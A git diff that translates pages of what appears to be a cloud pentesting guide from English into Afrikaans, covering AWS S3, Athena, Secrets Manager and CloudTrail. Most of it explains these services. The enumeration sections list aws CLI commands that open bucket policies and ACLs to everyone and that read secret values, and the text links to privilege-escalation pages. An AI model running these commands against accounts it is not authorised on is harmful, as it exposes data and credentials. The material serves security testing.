+Met hulpbron-gebaseerde toestemmings kan jy toestemmings vir sub-gidse van jou emmer apart definieer.
 
-### Bucket Versioning and MFA based delete
+### Emmerweergawe en MFA-gebaseerde verwydering
 
-When bucket versioning is enabled, any action that tries to alter a file inside a file will generate a new version of the file, keeping also the previous content of the same. Therefore, it won't overwrite its content.
+Wanneer emmerweergawe geaktiveer is, sal enige aksie wat probeer om 'n lêer binne 'n lêer te verander 'n nuwe weergawe van die lêer genereer, terwyl dit ook die vorige inhoud van dieselfde behou. Daarom sal dit nie sy inhoud oorskryf nie.
 
-Moreover, MFA based delete will prevent versions of file in the S3 bucket from being deleted and also Bucket Versioning from being disabled, so an attacker won't be able to alter these files.
+Boonop sal MFA-gebaseerde verwydering verhinder dat weergawes van lêers in die S3-emmer verwyder word en ook dat Emmerweergawe gedeaktiveer word, sodat 'n aanvaller nie in staat sal wees om hierdie lêers te verander nie.
 
-### S3 Access logs
+### S3 Toegang logs
 
-It's possible to **enable S3 access login** (which by default is disabled) to some bucket and save the logs in a different bucket to know who is accessing the bucket (both buckets must be in the same region).
+Dit is moontlik om **S3 toegang aan te dui** (wat standaard gedeaktiveer is) vir 'n emmer en die logs in 'n ander emmer te stoor om te weet wie die emmer toegang (albei emmers moet in dieselfde streek wees).
 
-### S3 Presigned URLs
-
-It's possible to generate a presigned URL that can usually be used to **access the specified file** in the bucket. A **presigned URL looks like this**:
+### S3 Presigned URL's
 
+Dit is moontlik om 'n presigned URL te genereer wat gewoonlik gebruik kan word om **toegang te verkry tot die gespesifiseerde lêer** in die emmer. 'n **presigned URL lyk soos volg**:
 ```
 https://<bucket-name>.s3.us-east-1.amazonaws.com/asd.txt?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAUUE8GZC4S5L3TY3P%2F20230227%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20230227T142551Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjELf%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIBhQpdETJO3HKKDk2hjNIrPWwBE8gZaQccZFV3kCpPCWAiEAid3ueDtFFU%2FOQfUpvxYTGO%2BHoS4SWDMUrQAE0pIaB40qggMIYBAAGgwzMTgxNDIxMzg1NTMiDJLI5t7gr2EGxG1Y5CrfAioW0foHIQ074y4gvk0c%2B%2Fmqc7cNWb1njQslQkeePHkseJ3owzc%2FCwkgE0EuZTd4mw0aJciA2XIbJRCLPWTb%2FCBKPnIMJ5aBzIiA2ltsiUNQTTUxYmEgXZoJ6rFYgcodnmWW0Et4Xw59UlHnCDB2bLImxPprriyCzDDCD6nLyp3J8pFF1S8h3ZTJE7XguA8joMs4%2B2B1%2FeOZfuxXKyXPYSKQOOSbQiHUQc%2BFnOfwxleRL16prWk1t7TamvHR%2Bt3UgMn5QWzB3p8FgWwpJ6GjHLkYMJZ379tkimL1tJ7o%2BIod%2FMYrS7LDCifP9d%2FuYOhKWGhaakPuJKJh9fl%2B0vGl7kmApXigROxEWon6ms75laXebltsWwKcKuYca%2BUWu4jVJx%2BWUfI4ofoaGiCSaKALTqwu4QNBRT%2BMoK6h%2BQa7gN7JFGg322lkxRY53x27WMbUE4unn5EmI54T4dWt1%2Bg8ljDS%2BvKfBjqmAWRwuqyfwXa5YC3xxttOr3YVvR6%2BaXpzWtvNJQNnb6v0uI3%2BTtTexZkJpLQYqFcgZLQSxsXWSnf988qvASCIUhAzp2UnS1uqy7QjtD5T73zksYN2aesll7rvB80qIuujG6NOdHnRJ2M5%2FKXXNo1Yd15MtzPuSjRoSB9RSMon5jFu31OrQnA9eCUoawxbB0nHqwK8a43CKBZHhA8RoUAJW%2B48EuFsp3U%3D&X-Amz-Signature=3436e4139e84dbcf5e2e6086c0ebc92f4e1e9332b6fda24697bc339acbf2cdfa
 ```
-
-A presigned URL can be **created from the cli using credentials of a principal with access to the object** (if the account you use doesn't have access, a shorter presigned URL will be created but it will be useless)
-
+'n Voorafondertekende URL kan **uit die cli geskep word met die kredensiale van 'n hoof met toegang tot die objek** (as die rekening wat jy gebruik nie toegang het nie, sal 'n korter voorafondertekende URL geskep word, maar dit sal nutteloos wees)
 ```bash
- aws s3 presign --region <bucket-region> 's3://<bucket-name>/<file-name>'
+aws s3 presign --region <bucket-region> 's3://<bucket-name>/<file-name>'
 ```
-
 > [!NOTE]
-> The only required permission to generate a presigned URL is the permission being given, so for the previous command the only permission needed by the principal is `s3:GetObject`
-
-It's also possible to create presigned URLs with **other permissions**:
+> Die enigste vereiste toestemming om 'n presigned URL te genereer, is die toestemming wat gegee word, so vir die vorige opdrag is die enigste toestemming wat deur die hoofpersoon benodig word `s3:GetObject`
 
+Dit is ook moontlik om presigned URLs te skep met **ander toestemmings**:
 ```python
 import boto3
 url = boto3.client('s3').generate_presigned_url(
-    ClientMethod='put_object',
-    Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'},
-    ExpiresIn=3600
+ClientMethod='put_object',
+Params={'Bucket': 'BUCKET_NAME', 'Key': 'OBJECT_KEY'},
+ExpiresIn=3600
 )
 ```
+### S3 Enkripsiemeganismes
 
-### S3 Encryption Mechanisms
-
-**DEK means Data Encryption Key** and is the key that is always generated and used to encrypt data.
+**DEK beteken Data Enkripsiesleutel** en is die sleutel wat altyd gegenereer en gebruik word om data te enkripteer.
 
 <details>
 
-<summary><strong>Server-side encryption with S3 managed keys, SSE-S3</strong></summary>
+<summary><strong>Bediener-kant enkripsie met S3 bestuurde sleutels, SSE-S3</strong></summary>
 
-This option requires minimal configuration and all management of encryption keys used are managed by AWS. All you need to do is to **upload your data and S3 will handle all other aspects**. Each bucket in a S3 account is assigned a bucket key.
+Hierdie opsie vereis minimale konfigurasie en al die bestuur van enkripsiesleutels wat gebruik word, word deur AWS bestuur. Al wat jy hoef te doen is om **jou data op te laai en S3 sal al die ander aspekte hanteer**. Elke emmer in 'n S3-rekening word aan 'n emmersleutel toegeken.
 
-- Encryption:
-  - Object Data + created plaintext DEK --> Encrypted data (stored inside S3)
-  - Created plaintext DEK + S3 Master Key --> Encrypted DEK (stored inside S3) and plain text is deleted from memory
-- Decryption:
-  - Encrypted DEK + S3 Master Key --> Plaintext DEK
-  - Plaintext DEK + Encrypted data --> Object Data
+- Enkripsie:
+- Objektdata + geskepte platte DEK --> Geënkripteerde data (gestoor binne S3)
+- Geskepte platte DEK + S3 Meestersleutel --> Geënkripteerde DEK (gestoor binne S3) en platte teks word uit geheue verwyder
+- Dekripsie:
+- Geënkripteerde DEK + S3 Meestersleutel --> Platte DEK
+- Platte DEK + Geënkripteerde data --> Objektdata
 
-Please, note that in this case **the key is managed by AWS** (rotation only every 3 years). If you use your own key you willbe able to rotate, disable and apply access control.
+Neem asseblief kennis dat in hierdie geval **die sleutel deur AWS bestuur word** (rotasie slegs elke 3 jaar). As jy jou eie sleutel gebruik, sal jy in staat wees om te roteer, te deaktiveer en toegangbeheer toe te pas.
 
 </details>
 
 <details>
 
-<summary><strong>Server-side encryption with KMS managed keys, SSE-KMS</strong></summary>
+<summary><strong>Bediener-kant enkripsie met KMS bestuurde sleutels, SSE-KMS</strong></summary>
 
-This method allows S3 to use the key management service to generate your data encryption keys. KMS gives you a far greater flexibility of how your keys are managed. For example, you are able to disable, rotate, and apply access controls to the CMK, and order to against their usage using AWS Cloud Trail.
+Hierdie metode laat S3 toe om die sleutelbestuursdiens te gebruik om jou data-enkripsiesleutels te genereer. KMS bied jou 'n baie groter buigsaamheid oor hoe jou sleutels bestuur word. Byvoorbeeld, jy kan die CMK deaktiveer, roteer en toegangbeheer toepas, en bestellings teen hul gebruik met AWS Cloud Trail.
 
-- Encryption:
-  - S3 request data keys from KMS CMK
-  - KMS uses a CMK to generate the pair DEK plaintext and DEK encrypted and send them to S£
-  - S3 uses the paintext key to encrypt the data, store the encrypted data and the encrypted key and deletes from memory the plain text key
-- Decryption:
-  - S3 ask to KMS to decrypt the encrypted data key of the object
-  - KMS decrypt the data key with the CMK and send it back to S3
-  - S3 decrypts the object data
+- Enkripsie:
+- S3 versoek data sleutels van KMS CMK
+- KMS gebruik 'n CMK om die paar DEK platte teks en DEK geënkripteer te genereer en dit na S3 te stuur
+- S3 gebruik die platte sleutel om die data te enkripteer, stoor die geënkripteerde data en die geënkripteerde sleutel en verwyder die platte sleutel uit geheue
+- Dekripsie:
+- S3 vra KMS om die geënkripteerde datasleutel van die objek te dekripteer
+- KMS dekripteer die datasleutel met die CMK en stuur dit terug na S3
+- S3 dekripteer die objektdata
 
 </details>
 
 <details>
 
-<summary><strong>Server-side encryption with customer provided keys, SSE-C</strong></summary>
+<summary><strong>Bediener-kant enkripsie met kliënt verskaf sleutels, SSE-C</strong></summary>
 
-This option gives you the opportunity to provide your own master key that you may already be using outside of AWS. Your customer-provided key would then be sent with your data to S3, where S3 would then perform the encryption for you.
+Hierdie opsie gee jou die geleentheid om jou eie meester sleutel te verskaf wat jy dalk reeds buite AWS gebruik. Jou kliënt-verskaf sleutel sal dan saam met jou data na S3 gestuur word, waar S3 dan die enkripsie vir jou sal uitvoer.
 
-- Encryption:
-  - The user sends the object data + Customer key to S3
-  - The customer key is used to encrypt the data and the encrypted data is stored
-  - a salted HMAC value of the customer key is stored also for future key validation
-  - the customer key is deleted from memory
-- Decryption:
-  - The user send the customer key
-  - The key is validated against the HMAC value stored
-  - The customer provided key is then used to decrypt the data
+- Enkripsie:
+- Die gebruiker stuur die objektdata + Kliëntsleutel na S3
+- Die kliëntsleutel word gebruik om die data te enkripteer en die geënkripteerde data word gestoor
+- 'n Gesoute HMAC-waarde van die kliëntsleutel word ook gestoor vir toekomstige sleutelvalidasie
+- die kliëntsleutel word uit geheue verwyder
+- Dekripsie:
+- Die gebruiker stuur die kliëntsleutel
+- Die sleutel word gevalideer teen die gestoor HMAC-waarde
+- Die kliënt verskaf sleutel word dan gebruik om die data te dekripteer
 
 </details>
 
 <details>
 
-<summary><strong>Client-side encryption with KMS, CSE-KMS</strong></summary>
+<summary><strong>Kliënt-kant enkripsie met KMS, CSE-KMS</strong></summary>
 
-Similarly to SSE-KMS, this also uses the key management service to generate your data encryption keys. However, this time KMS is called upon via the client not S3. The encryption then takes place client-side and the encrypted data is then sent to S3 to be stored.
+Soos met SSE-KMS, gebruik dit ook die sleutelbestuursdiens om jou data-enkripsiesleutels te genereer. Hierdie keer word KMS egter via die kliënt en nie S3 aangespreek nie. Die enkripsie vind dan kliënt-kant plaas en die geënkripteerde data word dan na S3 gestuur om gestoor te word.
 
-- Encryption:
-  - Client request for a data key to KMS
-  - KMS returns the plaintext DEK and the encrypted DEK with the CMK
-  - Both keys are sent back
-  - The client then encrypts the data with the plaintext DEK and send to S3 the encrypted data + the encrypted DEK (which is saved as metadata of the encrypted data inside S3)
-- Decryption:
-  - The encrypted data with the encrypted DEK is sent to the client
-  - The client asks KMS to decrypt the encrypted key using the CMK and KMS sends back the plaintext DEK
-  - The client can now decrypt the encrypted data
+- Enkripsie:
+- Kliënt versoek 'n datasleutel van KMS
+- KMS stuur die platte DEK en die geënkripteerde DEK met die CMK terug
+- Beide sleutels word teruggestuur
+- Die kliënt enkripteer dan die data met die platte DEK en stuur die geënkripteerde data + die geënkripteerde DEK (wat as metadata van die geënkripteerde data binne S3 gestoor word) na S3
+- Dekripsie:
+- Die geënkripteerde data met die geënkripteerde DEK word na die kliënt gestuur
+- Die kliënt vra KMS om die geënkripteerde sleutel met die CMK te dekripteer en KMS stuur die platte DEK terug
+- Die kliënt kan nou die geënkripteerde data dekripteer
 
 </details>
 
 <details>
 
-<summary><strong>Client-side encryption with customer provided keys, CSE-C</strong></summary>
+<summary><strong>Kliënt-kant enkripsie met kliënt verskaf sleutels, CSE-C</strong></summary>
 
-Using this mechanism, you are able to utilize your own provided keys and use an AWS-SDK client to encrypt your data before sending it to S3 for storage.
+Deur hierdie meganisme te gebruik, kan jy jou eie verskaf sleutels benut en 'n AWS-SDK kliënt gebruik om jou data te enkripteer voordat jy dit na S3 vir stoor stuur.
 
-- Encryption:
-  - The client generates a DEK and encrypts the plaintext data
-  - Then, using it's own custom CMK it encrypts the DEK
-  - submit the encrypted data + encrypted DEK to S3 where it's stored
-- Decryption:
-  - S3 sends the encrypted data and DEK
-  - As the client already has the CMK used to encrypt the DEK, it decrypts the DEK and then uses the plaintext DEK to decrypt the data
+- Enkripsie:
+- Die kliënt genereer 'n DEK en enkripteer die platte data
+- Dan, met behulp van sy eie pasgemaakte CMK, enkripteer dit die DEK
+- dien die geënkripteerde data + geënkripteerde DEK aan S3 waar dit gestoor word
+- Dekripsie:
+- S3 stuur die geënkripteerde data en DEK
+- Aangesien die kliënt reeds die CMK het wat gebruik is om die DEK te enkripteer, dekripteer dit die DEK en gebruik dan die platte DEK om die data te dekripteer
 
 </details>
 
-### **Enumeration**
-
-One of the traditional main ways of compromising AWS orgs start by compromising buckets publicly accesible. **You can find** [**public buckets enumerators in this page**](../aws-unauthenticated-enum-access/#s3-buckets)**.**
+### **Enumerasie**
 
+Een van die tradisionele hoofmaniere om AWS-organisasies te kompromitteer, begin deur emmers wat publiek toeganklik is, te kompromitteer. **Jy kan** [**publieke emmer enumerators op hierdie bladsy vind**](../aws-unauthenticated-enum-access/#s3-buckets)**.**
 ```bash
 # Get buckets ACLs
 aws s3api get-bucket-acl --bucket <bucket-name>
@@ -184,28 +177,28 @@ aws s3api list-objects --bucket BUCKETNAME --output json --query "[sum(Contents[
 aws s3api put-bucket-policy --policy file:///root/policy.json --bucket <bucket-name>
 ##JSON policy example
 {
-  "Id": "Policy1568185116930",
-  "Version": "2012-10-17",
-  "Statement": [
-  {
-      "Sid": "Stmt1568184932403",
-      "Action": [
-        "s3:ListBucket"
-      ],
-      "Effect": "Allow",
-      "Resource": "arn:aws:s3:::welcome",
-      "Principal": "*"
-  },
-  {
-    "Sid": "Stmt1568185007451",
-    "Action": [
-      "s3:GetObject"
-    ],
-    "Effect": "Allow",
-    "Resource": "arn:aws:s3:::welcome/*",
-    "Principal": "*"
-  }
-  ]
+"Id": "Policy1568185116930",
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "Stmt1568184932403",
+"Action": [
+"s3:ListBucket"
+],
+"Effect": "Allow",
+"Resource": "arn:aws:s3:::welcome",
+"Principal": "*"
+},
+{
+"Sid": "Stmt1568185007451",
+"Action": [
+"s3:GetObject"
+],
+"Effect": "Allow",
+"Resource": "arn:aws:s3:::welcome/*",
+"Principal": "*"
+}
+]
 }
 
 # Update bucket ACL
@@ -218,35 +211,34 @@ aws s3api put-object-acl --bucket <bucket-name> --key flag --access-control-poli
 ##JSON ACL example
 ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
 {
-  "Owner": {
-    "DisplayName": "<DisplayName>",
-    "ID": "<ID>"
-  },
-  "Grants": [
-  {
-    "Grantee": {
-      "Type": "Group",
-      "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
-    },
-  "Permission": "FULL_CONTROL"
-  }
-  ]
+"Owner": {
+"DisplayName": "<DisplayName>",
+"ID": "<ID>"
+},
+"Grants": [
+{
+"Grantee": {
+"Type": "Group",
+"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
+},
+"Permission": "FULL_CONTROL"
+}
+]
 }
 ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
 ```
-
 ### dual-stack <a href="#dual-stack-endpoints-description" id="dual-stack-endpoints-description"></a>
 
-You can access an S3 bucket through a dual-stack endpoint by using a virtual hosted-style or a path-style endpoint name. These are useful to access S3 through IPv6.
+Jy kan toegang tot 'n S3-bucket verkry deur 'n dual-stack eindpunt te gebruik met 'n virtuele gehuisvesde styl of 'n padstyl eindpuntnaam. Hierdie is nuttig om S3 deur IPv6 te benader.
 
-Dual-stack endpoints use the following syntax:
+Dual-stack eindpunte gebruik die volgende sintaksis:
 
 - `bucketname.s3.dualstack.aws-region.amazonaws.com`
 - `s3.dualstack.aws-region.amazonaws.com/bucketname`
 
 ### Privesc
 
-In the following page you can check how to **abuse S3 permissions to escalate privileges**:
+Op die volgende bladsy kan jy kyk hoe om **S3-toestemmings te misbruik om voorregte te verhoog**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-s3-privesc.md
@@ -274,22 +266,21 @@ In the following page you can check how to **abuse S3 permissions to escalate pr
 
 ### S3 HTTP Cache Poisoning Issue <a href="#heading-s3-http-desync-cache-poisoning-issue" id="heading-s3-http-desync-cache-poisoning-issue"></a>
 
-[**According to this research**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies#heading-s3-http-desync-cache-poisoning-issue) it was possible to cache the response of an arbitrary bucket as if it belonged to a different one. This could have been abused to change for example javascript file responses and compromise arbitrary pages using S3 to store static code.
+[**Volgens hierdie navorsing**](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies#heading-s3-http-desync-cache-poisoning-issue) was dit moontlik om die antwoord van 'n arbitrêre bucket te kas asof dit aan 'n ander behoort. Dit kon misbruik gewees het om byvoorbeeld javascript-lêer-antwoorde te verander en arbitrêre bladsye te kompromitteer wat S3 gebruik om statiese kode te stoor.
 
 ## Amazon Athena
 
-Amazon Athena is an interactive query service that makes it easy to **analyze data** directly in Amazon Simple Storage Service (Amazon **S3**) **using** standard **SQL**.
+Amazon Athena is 'n interaktiewe vrae-diens wat dit maklik maak om **data** direk in Amazon Simple Storage Service (Amazon **S3**) **te analiseer** met standaard **SQL**.
 
-You need to **prepare a relational DB table** with the format of the content that is going to appear in the monitored S3 buckets. And then, Amazon Athena will be able to populate the DB from the logs, so you can query it.
+Jy moet 'n **relationele DB-tabel voorberei** met die formaat van die inhoud wat in die gemonitorde S3-buckets gaan verskyn. En dan sal Amazon Athena in staat wees om die DB uit die logs te vul, sodat jy dit kan vra.
 
-Amazon Athena supports the **ability to query S3 data that is already encrypted** and if configured to do so, **Athena can also encrypt the results of the query which can then be stored in S3**.
+Amazon Athena ondersteun die **vermoë om S3-data wat reeds versleuteld is, te vra** en as dit geconfigureer is om dit te doen, **kan Athena ook die resultate van die vraag versleuteld wat dan in S3 gestoor kan word**.
 
-**This encryption of results is independent of the underlying queried S3 data**, meaning that even if the S3 data is not encrypted, the queried results can be encrypted. A couple of points to be aware of is that Amazon Athena only supports data that has been **encrypted** with the **following S3 encryption methods**, **SSE-S3, SSE-KMS, and CSE-KMS**.
+**Hierdie versleuteling van resultate is onafhanklik van die onderliggende gevraagde S3-data**, wat beteken dat selfs al is die S3-data nie versleuteld nie, kan die gevraagde resultate versleuteld wees. 'n Paar punte om bewus van te wees is dat Amazon Athena slegs data ondersteun wat **versleuteld** is met die **volgende S3-versleutelingmetodes**, **SSE-S3, SSE-KMS, en CSE-KMS**.
 
-SSE-C and CSE-E are not supported. In addition to this, it's important to understand that Amazon Athena will only run queries against **encrypted objects that are in the same region as the query itself**. If you need to query S3 data that's been encrypted using KMS, then specific permissions are required by the Athena user to enable them to perform the query.
+SSE-C en CSE-E word nie ondersteun nie. Benewens dit, is dit belangrik om te verstaan dat Amazon Athena slegs vrae teen **versleutelde voorwerpe wat in dieselfde streek as die vraag self is** sal uitvoer. As jy S3-data moet vra wat met KMS versleuteld is, dan is spesifieke toestemmings nodig deur die Athena-gebruiker om hulle in staat te stel om die vraag uit te voer.
 
 ### Enumeration
-
 ```bash
 # Get catalogs
 aws athena list-data-catalogs
@@ -311,14 +302,9 @@ aws athena get-prepared-statement --statement-name <name> --work-group <wg-name>
 # Run query
 aws athena start-query-execution --query-string <query>
 ```
-
-## References
+## Verwysings
 
 - [https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3](https://cloudsecdocs.com/aws/defensive/tooling/cli/#s3)
 - [https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html](https://docs.aws.amazon.com/AmazonS3/latest/userguide/dual-stack-endpoints.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md
index a50eaa24f..a8d2994e7 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-secrets-manager-enum.md
@@ -4,22 +4,21 @@
 
 ## AWS Secrets Manager
 
-AWS Secrets Manager is designed to **eliminate the use of hard-coded secrets in applications by replacing them with an API call**. This service serves as a **centralized repository for all your secrets**, ensuring they are managed uniformly across all applications.
+AWS Secrets Manager is ontwerp om **die gebruik van hard-gecodeerde geheime in toepassings te elimineer deur dit met 'n API-oproep te vervang**. Hierdie diens dien as 'n **gecentraliseerde berging vir al jou geheime**, wat verseker dat dit uniform bestuur word oor alle toepassings.
 
-The manager simplifies the **process of rotating secrets**, significantly improving the security posture of sensitive data like database credentials. Additionally, secrets like API keys can be automatically rotated with the integration of lambda functions.
+Die bestuurder vereenvoudig die **proses om geheime te roteer**, wat die sekuriteitsposisie van sensitiewe data soos databasisakkrediteer verbeter. Daarbenewens kan geheime soos API-sleutels outomaties geroteer word met die integrasie van lambda-funksies.
 
-The access to secrets is tightly controlled through detailed IAM identity-based policies and resource-based policies.
+Die toegang tot geheime word noukeurig beheer deur middel van gedetailleerde IAM identiteit-gebaseerde beleide en hulpbron-gebaseerde beleide.
 
-For granting access to secrets to a user from a different AWS account, it's necessary to:
+Om toegang tot geheime aan 'n gebruiker van 'n ander AWS-rekening te verleen, is dit nodig om:
 
-1. Authorize the user to access the secret.
-2. Grant permission to the user to decrypt the secret using KMS.
-3. Modify the Key policy to allow the external user to utilize it.
+1. Die gebruiker te magtig om toegang tot die geheim te verkry.
+2. Toestemming aan die gebruiker te verleen om die geheim met KMS te ontsleutel.
+3. Die Sleutelbeleid te wysig om die eksterne gebruiker toe te laat om dit te gebruik.
 
-**AWS Secrets Manager integrates with AWS KMS to encrypt your secrets within AWS Secrets Manager.**
+**AWS Secrets Manager integreer met AWS KMS om jou geheime binne AWS Secrets Manager te enkripteer.**
 
 ### **Enumeration**
-
 ```bash
 aws secretsmanager list-secrets #Get metadata of all secrets
 aws secretsmanager list-secret-version-ids --secret-id <secret_name> # Get versions
@@ -28,7 +27,6 @@ aws secretsmanager get-secret-value --secret-id <secret_name> # Get value
 aws secretsmanager get-secret-value --secret-id <secret_name> --version-id <version-id> # Get value of a different version
 aws secretsmanager get-resource-policy --secret-id --secret-id <secret_name>
 ```
-
 ### Privesc
 
 {{#ref}}
@@ -41,14 +39,10 @@ aws secretsmanager get-resource-policy --secret-id --secret-id <secret_name>
 ../aws-post-exploitation/aws-secrets-manager-post-exploitation.md
 {{#endref}}
 
-### Persistence
+### Persistensie
 
 {{#ref}}
 ../aws-persistence/aws-secrets-manager-persistence.md
 {{#endref}}
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
index 8348ff098..413a6c2ba 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/README.md
@@ -1,6 +1 @@
-# AWS - Security & Detection Services
-
-
-
-
-
+# AWS - Sekuriteit & Deteksiedienste
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md
index 780f52f6e..a9bc29069 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-security-and-detection-services/aws-cloudtrail-enum.md
@@ -4,111 +4,108 @@
 
 ## **CloudTrail**
 
-AWS CloudTrail **records and monitors activity within your AWS environment**. It captures detailed **event logs**, including who did what, when, and from where, for all interactions with AWS resources. This provides an audit trail of changes and actions, aiding in security analysis, compliance auditing, and resource change tracking. CloudTrail is essential for understanding user and resource behavior, enhancing security postures, and ensuring regulatory compliance.
+AWS CloudTrail **registreer en monitor aktiwiteit binne jou AWS omgewing**. Dit vang gedetailleerde **gebeurtenislogs**, insluitend wie wat gedoen het, wanneer, en van waar, vir alle interaksies met AWS hulpbronne. Dit bied 'n oudit spoor van veranderinge en aksies, wat help met sekuriteitsanalise, nakoming ouditering, en hulpbron verandering opsporing. CloudTrail is noodsaaklik om gebruikers- en hulpbron gedrag te verstaan, om sekuriteitsposisies te verbeter, en om regulatoriese nakoming te verseker.
 
-Each logged event contains:
+Elke gelogde gebeurtenis bevat:
 
-- The name of the called API: `eventName`
-- The called service: `eventSource`
-- The time: `eventTime`
-- The IP address: `SourceIPAddress`
-- The agent method: `userAgent`. Examples:
-  - Signing.amazonaws.com - From AWS Management Console
-  - console.amazonaws.com - Root user of the account
-  - lambda.amazonaws.com - AWS Lambda
-- The request parameters: `requestParameters`
-- The response elements: `responseElements`
+- Die naam van die aangeroep API: `eventName`
+- Die aangeroep diens: `eventSource`
+- Die tyd: `eventTime`
+- Die IP adres: `SourceIPAddress`
+- Die agent metode: `userAgent`. Voorbeelde:
+- Signing.amazonaws.com - Van AWS Bestuurskonsol
+- console.amazonaws.com - Wortel gebruiker van die rekening
+- lambda.amazonaws.com - AWS Lambda
+- Die versoekparameters: `requestParameters`
+- Die respons elemente: `responseElements`
 
-Event's are written to a new log file **approximately each 5 minutes in a JSON file**, they are held by CloudTrail and finally, log files are **delivered to S3 approximately 15mins after**.\
-CloudTrails logs can be **aggregated across accounts and across regions.**\
-CloudTrail allows to use **log file integrity in order to be able to verify that your log files have remained unchanged** since CloudTrail delivered them to you. It creates a SHA-256 hash of the logs inside a digest file. A sha-256 hash of the new logs is created every hour.\
-When creating a Trail the event selectors will allow you to indicate the trail to log: Management, data or insights events.
+Gebeurtenisse word na 'n nuwe loglêer **ongeveer elke 5 minute in 'n JSON-lêer** geskryf, hulle word deur CloudTrail gehou en uiteindelik, loglêers word **aan S3 afgelewer ongeveer 15min na**.\
+CloudTrail se logs kan **geaggregeer word oor rekeninge en oor streke.**\
+CloudTrail laat toe om **loglêer integriteit te gebruik om te kan verifieer dat jou loglêers onveranderd gebly het** sedert CloudTrail dit aan jou afgelewer het. Dit skep 'n SHA-256 hash van die logs binne 'n digest-lêer. 'n sha-256 hash van die nuwe logs word elke uur geskep.\
+Wanneer 'n Trail geskep word, sal die gebeurteniskeuses jou toelaat om die trail aan te dui om te log: Bestuur, data of insig gebeurtenisse.
 
-Logs are saved in an S3 bucket. By default Server Side Encryption is used (SSE-S3) so AWS will decrypt the content for the people that has access to it, but for additional security you can use SSE with KMS and your own keys.
+Logs word in 'n S3-bucket gestoor. Standaard word Server Side Encryption (SSE-S3) gebruik, so AWS sal die inhoud ontsleutel vir die mense wat toegang het, maar vir bykomende sekuriteit kan jy SSE met KMS en jou eie sleutels gebruik.
 
-The logs are stored in a **S3 bucket with this name format**:
+Die logs word gestoor in 'n **S3-bucket met hierdie naamformaat**:
 
 - **`BucketName/AWSLogs/AccountID/CloudTrail/RegionName/YYY/MM/DD`**
-- Being the BucketName: **`aws-cloudtrail-logs-<accountid>-<random>`**
-- Example: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`**
+- Waar die BucketName is: **`aws-cloudtrail-logs-<accountid>-<random>`**
+- Voorbeeld: **`aws-cloudtrail-logs-947247140022-ffb95fe7/AWSLogs/947247140022/CloudTrail/ap-south-1/2023/02/22/`**
 
-Inside each folder each log will have a **name following this format**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`**
+Binne elke gids sal elke log 'n **naam hê wat hierdie formaat volg**: **`AccountID_CloudTrail_RegionName_YYYYMMDDTHHMMZ_Random.json.gz`**
 
-Log File Naming Convention
+Log Lêer Naam Konvensie
 
 ![](<../../../../images/image (122).png>)
 
-Moreover, **digest files (to check file integrity)** will be inside the **same bucket** in:
+Boonop, **digest-lêers (om lêer integriteit te kontroleer)** sal binne die **dieselfde bucket** wees in:
 
 ![](<../../../../images/image (195).png>)
 
-### Aggregate Logs from Multiple Accounts
+### Geaggregeerde Logs van Meerdere Rekeninge
 
-- Create a Trial in the AWS account where you want the log files to be delivered to
-- Apply permissions to the destination S3 bucket allowing cross-account access for CloudTrail and allow each AWS account that needs access
-- Create a new Trail in the other AWS accounts and select to use the created bucket in step 1
+- Skep 'n Trail in die AWS rekening waar jy wil hê die loglêers moet afgelewer word
+- Pas toestemmings toe op die bestemmings S3-bucket wat kruis-rekening toegang vir CloudTrail toelaat en laat elke AWS rekening wat toegang benodig toe
+- Skep 'n nuwe Trail in die ander AWS rekeninge en kies om die geskepte bucket in stap 1 te gebruik
 
-However, even if you can save al the logs in the same S3 bucket, you cannot aggregate CloudTrail logs from multiple accounts into a CloudWatch Logs belonging to a single AWS account.
+Egter, selfs al kan jy al die logs in dieselfde S3-bucket stoor, kan jy nie CloudTrail logs van meerdere rekeninge in 'n CloudWatch Logs wat aan 'n enkele AWS rekening behoort, aggregeer nie.
 
 > [!CAUTION]
-> Remember that an account can have **different Trails** from CloudTrail **enabled** storing the same (or different) logs in different buckets.
+> Onthou dat 'n rekening **verskillende Trails** van CloudTrail **geaktiveer** kan hê wat dieselfde (of verskillende) logs in verskillende buckets stoor.
 
-### Cloudtrail from all org accounts into 1
+### Cloudtrail van alle org rekeninge in 1
 
-When creating a CloudTrail, it's possible to indicate to get activate cloudtrail for all the accounts in the org and get the logs into just 1 bucket:
